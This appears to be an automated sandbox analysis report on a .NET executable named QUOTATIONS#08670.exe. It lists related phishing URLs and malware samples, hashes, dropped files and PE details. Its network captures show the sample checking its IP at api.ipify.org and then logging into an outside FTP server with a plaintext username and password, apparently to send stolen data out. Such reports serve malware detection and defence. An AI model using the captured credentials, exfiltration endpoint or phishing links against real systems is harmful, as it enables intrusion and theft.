                                                        https://drmerp.com/bWFpbEBrc2xhdy5jby51aw==&xBvSo7gjDRPy&hmr&x-ad-vt-unk&OC305935Get hashmaliciousHTMLPhisherBrowse
                                                        • 104.18.95.41
                                                        phish_alert_sp2_2.0.0.0.emlGet hashmaliciousPhisherBrowse
                                                        • 104.22.72.81
                                                        http://arcor.cfdGet hashmaliciousHTMLPhisherBrowse
                                                        • 104.17.25.14
                                                        Message_2484922.emlGet hashmaliciousUnknownBrowse
                                                        • 1.1.1.1
                                                        http://arcor.cfd#warszawa@psgaz.plGet hashmaliciousHTMLPhisherBrowse
                                                        • 104.17.25.14
                                                        https://terryatchison-my.sharepoint.com/:f:/g/personal/terry_terryatchison_com_au/ElPLLTBYg_xBi3psE6F6HW0BDiAPLHOUdwoTRpPTGgsocg?e=hlVHMOGet hashmaliciousUnknownBrowse
                                                        • 104.17.25.14
                                                        http://investmentmemo.xyzGet hashmaliciousHtmlDropperBrowse
                                                        • 188.114.96.3
                                                        https://www.google.com.pe/url?q=Y7AzKRq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kI3xqbL8&sa=t&url=amp%2F%E2%80%8Bfc%C2%ADcid%E3%80%82io/www/%E2%80%8Brosan%C2%ADasidon%C2%ADiotri%C2%ADcologista%E2%80%8B.co%C2%ADm.%C2%ADbr/lo/lo//nJ5u8/Y21jX2FsbF9lbXBsb3llZXNfY29zdGFfcmljYUBjYXRhbGluYS5jb20=$Get hashmaliciousHtmlDropperBrowse
                                                        • 104.21.74.63
                                                        https://dtss.powerappsportals.com/Get hashmaliciousUnknownBrowse
                                                        • 104.18.3.157
                                                        UNIFIEDLAYER-AS-1USphish_alert_sp2_2.0.0.0.emlGet hashmaliciousPhisherBrowse
                                                        • 108.179.194.43
                                                        https://globalairt.com/arull.php?7104797967704b536932307464507a53744a4c53704a7a4d77727273784c7a7453725374524c7a732f564c3477776474594841413d3dkkirkman@ssc.nsw.gov.auGet hashmaliciousHTMLPhisherBrowse
                                                        • 162.215.211.9
                                                        Globalfoundries.com_Report_46279.pdfGet hashmaliciousHTMLPhisherBrowse
                                                        • 192.185.163.42
                                                        http://0f46b0f46b.briandrakebooks.com/Get hashmaliciousUnknownBrowse
                                                        • 192.254.234.134
                                                        Play_VM-NowCWhiteAudiowav012.htmlGet hashmaliciousTycoon2FABrowse
                                                        • 69.49.245.172
                                                        deveba=.htmlGet hashmaliciousUnknownBrowse
                                                        • 69.49.245.172
                                                        Remittance_10_0224.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 69.49.245.172
                                                        PO#001498.exeGet hashmaliciousFormBookBrowse
                                                        • 162.240.81.18
                                                        SKM_C257i24092511530Kaplama.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 108.167.140.123
                                                        DHL Shipping documents 0020398484995500.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 192.185.13.234

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0e1.cmdGet hashmaliciousUnknownBrowse
                                                        • 104.26.12.205
                                                        2.cmdGet hashmaliciousUnknownBrowse
                                                        • 104.26.12.205
                                                        download_2.exeGet hashmaliciousQuasarBrowse
                                                        • 104.26.12.205
                                                        PVUfopbGfc.exeGet hashmaliciousLummaCBrowse
                                                        • 104.26.12.205
                                                        gp4uQBDTP8.exeGet hashmaliciousXehook StealerBrowse
                                                        • 104.26.12.205
                                                        dNNMgwxY4f.exeGet hashmaliciousXehook StealerBrowse
                                                        • 104.26.12.205
                                                        tYeFOUhVLd.exeGet hashmaliciousRedLineBrowse
                                                        • 104.26.12.205
                                                        SKMBT_77122012816310TD0128_17311_XLS.vbsGet hashmaliciousRemcosBrowse
                                                        • 104.26.12.205
                                                        Purchase Order - PO14895.vbsGet hashmaliciousRemcosBrowse
                                                        • 104.26.12.205
                                                        GeriOdemeBildirimi942.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 104.26.12.205

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATIONS#08670.exe.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\QUOTATIONS#08670.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1216
                                                        Entropy (8bit):5.34331486778365
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4KH1qE4x84qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHxviYHKh3oPtHo6hAHKzea
                                                        MD5:7B709BC412BEC5C3CFD861C041DAD408
                                                        SHA1:532EA6BB3018AE3B51E7A5788F614A6C49252BCF
                                                        SHA-256:733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
                                                        SHA-512:B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
                                                        Malicious:true
                                                        Reputation:moderate, very likely benign file
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                        C:\Users\user\AppData\Roaming\newapp\newapp.exe

                                                        Download File
                                                        Process:C:\Users\user\Desktop\QUOTATIONS#08670.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1330176
                                                        Entropy (8bit):6.4589781784491676
                                                        Encrypted:false
                                                        SSDEEP:12288:HCC3OpHnvQoS7uwXMox9rqKiZDhYkS07bRKu0ZATyMw57+xvoKyq5L/nqF0ECD45:H33MHn4o7wXZx9rQS0/QWzgF5Qvww
                                                        MD5:B88A9908634769557E2B6396F634C4AE
                                                        SHA1:49EE7BF7463600DD8CD4B650AC0644C1A4FFB239
                                                        SHA-256:FA7D9FFD715033A0B922B2B65F1FA6DA05BB9FEAFE1432A9CC0863F7F640A3F9
                                                        SHA-512:C7188D41E7BF479CBAF0CDA3C3C2B585AFF910849D4EAF40AA80362F05268BF7EAA765CD21DD266ACEE62C121E1597EB85828C1A5323318DFF80B96810A855C8
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 24%
                                                        Reputation:low
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... .>.................:...........X... ...`....@.. ....................................`.................................8X..S....`............................................................................... ............... ..H............text....8... ...:.................. ..`.rsrc........`.......<..............@..@.reloc...............J..............@..B................pX......H...........0................1..........................................re..d.U.,....*x...kU.././...=...Kwx.f.J.&.....O.'T.....,.......!a...N.... ..0..:.[..t.:...6.W1..&...w...o.n6..-w^\....J..4..-.....).-..rWR....h."'...m.5..5if.H..H.).R...A...h..jr..&.m.r.+9.~.g....*...]|..M..Y:(?A..3.V&.2..g.d.z6.o.........t...5..o..B...K......7.;<....].&[f.\L(.~jND..:^.]UET..thZ....,...0.\......%-.6....C......+..8.m.o.$...k..[%.gE{.G.....B.TrR..X.\.0..A..ED.q?._...

                                                        C:\Users\user\AppData\Roaming\newapp\newapp.exe:Zone.Identifier

                                                        Download File
                                                        Process:C:\Users\user\Desktop\QUOTATIONS#08670.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):6.4589781784491676
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:QUOTATIONS#08670.exe
                                                        File size:1'330'176 bytes
                                                        MD5:b88a9908634769557e2b6396f634c4ae
                                                        SHA1:49ee7bf7463600dd8cd4b650ac0644c1a4ffb239
                                                        SHA256:fa7d9ffd715033a0b922b2b65f1fa6da05bb9feafe1432a9cc0863f7f640a3f9
                                                        SHA512:c7188d41e7bf479cbaf0cda3c3c2b585aff910849d4eaf40aa80362f05268bf7eaa765cd21dd266acee62c121e1597eb85828c1a5323318dff80b96810a855c8
                                                        SSDEEP:12288:HCC3OpHnvQoS7uwXMox9rqKiZDhYkS07bRKu0ZATyMw57+xvoKyq5L/nqF0ECD45:H33MHn4o7wXZx9rQS0/QWzgF5Qvww
                                                        TLSH:B65518E79E493115C523B77B0F279A0C975E0C1FBEE469AB488F6262E6F830D9C450C9
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... .>.................:...........X... ...`....@.. ....................................`................................

                                                        File Icon

                                                        Icon Hash:443ad8d4dc581348

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x53588e
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x3EDD2005 [Tue Jun 3 22:24:05 2003 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1358380x53.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1360000x10ccc.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1480000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000x1338940x133a00431c49b27bff471fa8af045c1da5619aFalse0.596332474095896data6.432758502374913IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0x1360000x10ccc0x10e00ce4b4bd05567e59ae0de486b9c7eae16False0.058680555555555555data3.1462721950187196IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x1480000xc0x2006c5e92b84df8fb1af014f27e241072ffFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0x1360e80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/m0.05199337513308885
                                                        RT_GROUP_ICON0x1469100x14data1.25
                                                        RT_VERSION0x1469240x3a8data0.4358974358974359

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 3, 2024 14:29:19.042311907 CEST62916443192.168.2.11104.26.12.205
                                                        Oct 3, 2024 14:29:19.042368889 CEST44362916104.26.12.205192.168.2.11
                                                        Oct 3, 2024 14:29:19.042443991 CEST62916443192.168.2.11104.26.12.205
                                                        Oct 3, 2024 14:29:19.051403046 CEST62916443192.168.2.11104.26.12.205
                                                        Oct 3, 2024 14:29:19.051417112 CEST44362916104.26.12.205192.168.2.11
                                                        Oct 3, 2024 14:29:19.575258017 CEST44362916104.26.12.205192.168.2.11
                                                        Oct 3, 2024 14:29:19.575402975 CEST62916443192.168.2.11104.26.12.205
                                                        Oct 3, 2024 14:29:19.577789068 CEST62916443192.168.2.11104.26.12.205
                                                        Oct 3, 2024 14:29:19.577800035 CEST44362916104.26.12.205192.168.2.11
                                                        Oct 3, 2024 14:29:19.578082085 CEST44362916104.26.12.205192.168.2.11
                                                        Oct 3, 2024 14:29:19.620659113 CEST62916443192.168.2.11104.26.12.205
                                                        Oct 3, 2024 14:29:19.643815041 CEST62916443192.168.2.11104.26.12.205
                                                        Oct 3, 2024 14:29:19.687398911 CEST44362916104.26.12.205192.168.2.11
                                                        Oct 3, 2024 14:29:19.759422064 CEST44362916104.26.12.205192.168.2.11
                                                        Oct 3, 2024 14:29:19.759588957 CEST44362916104.26.12.205192.168.2.11
                                                        Oct 3, 2024 14:29:19.759659052 CEST62916443192.168.2.11104.26.12.205
                                                        Oct 3, 2024 14:29:19.769767046 CEST62916443192.168.2.11104.26.12.205
                                                        Oct 3, 2024 14:29:21.063005924 CEST6291721192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:21.074860096 CEST2162917192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:21.074970961 CEST6291721192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:21.078624010 CEST6291721192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:21.086905956 CEST2162917192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:21.086966038 CEST6291721192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:21.107405901 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:21.112906933 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:21.112999916 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:21.717237949 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:21.717547894 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:21.751313925 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:22.051707983 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:22.055375099 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:22.070780039 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:22.325660944 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:22.325845957 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:22.343765020 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:22.508548975 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:22.513921976 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:22.525785923 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:22.679711103 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:22.680447102 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:22.687129974 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:22.836561918 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:22.836925983 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:22.841939926 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:22.991561890 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:22.992522955 CEST6291931841192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:22.997451067 CEST3184162919192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:22.997569084 CEST6291931841192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:22.997648001 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:23.004482031 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:23.480211020 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:23.480535984 CEST6291931841192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:23.480567932 CEST6291931841192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:23.485693932 CEST3184162919192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:23.485830069 CEST3184162919192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:23.485888004 CEST6291931841192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:23.526951075 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:23.636200905 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:23.637932062 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:23.643260002 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:23.794596910 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:23.795166969 CEST6292045522192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:23.800055981 CEST4552262920192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:23.800158978 CEST6292045522192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:23.800286055 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:23.805259943 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:24.284827948 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:24.286446095 CEST6292045522192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:24.291990042 CEST4552262920192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:24.292165995 CEST6292045522192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:24.339589119 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:24.441698074 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:24.444889069 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:24.449747086 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:24.599354982 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:24.602680922 CEST6292148969192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:24.608620882 CEST4896962921192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:24.609759092 CEST6292148969192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:24.609854937 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:24.615482092 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:25.088445902 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:25.095057011 CEST6292148969192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:25.100382090 CEST4896962921192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:25.100446939 CEST6292148969192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:25.136424065 CEST6291821192.168.2.11192.254.225.136
                                                        Oct 3, 2024 14:29:25.250185966 CEST2162918192.254.225.136192.168.2.11
                                                        Oct 3, 2024 14:29:25.292550087 CEST6291821192.168.2.11192.254.225.136

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 3, 2024 14:28:55.237112999 CEST5357949162.159.36.2192.168.2.11
                                                        Oct 3, 2024 14:28:55.718930960 CEST53589691.1.1.1192.168.2.11
                                                        Oct 3, 2024 14:29:19.028096914 CEST5921853192.168.2.111.1.1.1
                                                        Oct 3, 2024 14:29:19.035286903 CEST53592181.1.1.1192.168.2.11
                                                        Oct 3, 2024 14:29:20.549104929 CEST5255653192.168.2.111.1.1.1
                                                        Oct 3, 2024 14:29:21.061662912 CEST53525561.1.1.1192.168.2.11

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Oct 3, 2024 14:29:19.028096914 CEST192.168.2.111.1.1.10xefa6Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                        Oct 3, 2024 14:29:20.549104929 CEST192.168.2.111.1.1.10xab46Standard query (0)ftp.ercolina-usa.comA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Oct 3, 2024 14:29:19.035286903 CEST1.1.1.1192.168.2.110xefa6No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                        Oct 3, 2024 14:29:19.035286903 CEST1.1.1.1192.168.2.110xefa6No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                        Oct 3, 2024 14:29:19.035286903 CEST1.1.1.1192.168.2.110xefa6No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                        Oct 3, 2024 14:29:21.061662912 CEST1.1.1.1192.168.2.110xab46No error (0)ftp.ercolina-usa.comercolina-usa.comCNAME (Canonical name)IN (0x0001)false
                                                        Oct 3, 2024 14:29:21.061662912 CEST1.1.1.1192.168.2.110xab46No error (0)ercolina-usa.com192.254.225.136A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • api.ipify.org

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.1162916104.26.12.2054438124C:\Users\user\Desktop\QUOTATIONS#08670.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-03 12:29:19 UTC155OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                        Host: api.ipify.org
                                                        Connection: Keep-Alive
                                                        2024-10-03 12:29:19 UTC211INHTTP/1.1 200 OK
                                                        Date: Thu, 03 Oct 2024 12:29:19 GMT
                                                        Content-Type: text/plain
                                                        Content-Length: 11
                                                        Connection: close
                                                        Vary: Origin
                                                        CF-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 8cccefe61caa43b8-EWR
                                                        2024-10-03 12:29:19 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                        Data Ascii: 8.46.123.33


                                                        FTP Packets

                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                        Oct 3, 2024 14:29:21.717237949 CEST2162918192.254.225.136192.168.2.11220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 150 allowed.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 150 allowed.220-Local time is now 07:29. Server port: 21.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 150 allowed.220-Local time is now 07:29. Server port: 21.220-IPv6 connections are also welcome on this server.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 150 allowed.220-Local time is now 07:29. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                        Oct 3, 2024 14:29:21.717547894 CEST6291821192.168.2.11192.254.225.136USER me@ercolina-usa.com
                                                        Oct 3, 2024 14:29:22.051707983 CEST2162918192.254.225.136192.168.2.11331 User me@ercolina-usa.com OK. Password required
                                                        Oct 3, 2024 14:29:22.055375099 CEST6291821192.168.2.11192.254.225.136PASS uy,o#mZj8$lY
                                                        Oct 3, 2024 14:29:22.325660944 CEST2162918192.254.225.136192.168.2.11230 OK. Current restricted directory is /
                                                        Oct 3, 2024 14:29:22.508548975 CEST2162918192.254.225.136192.168.2.11504 Unknown command
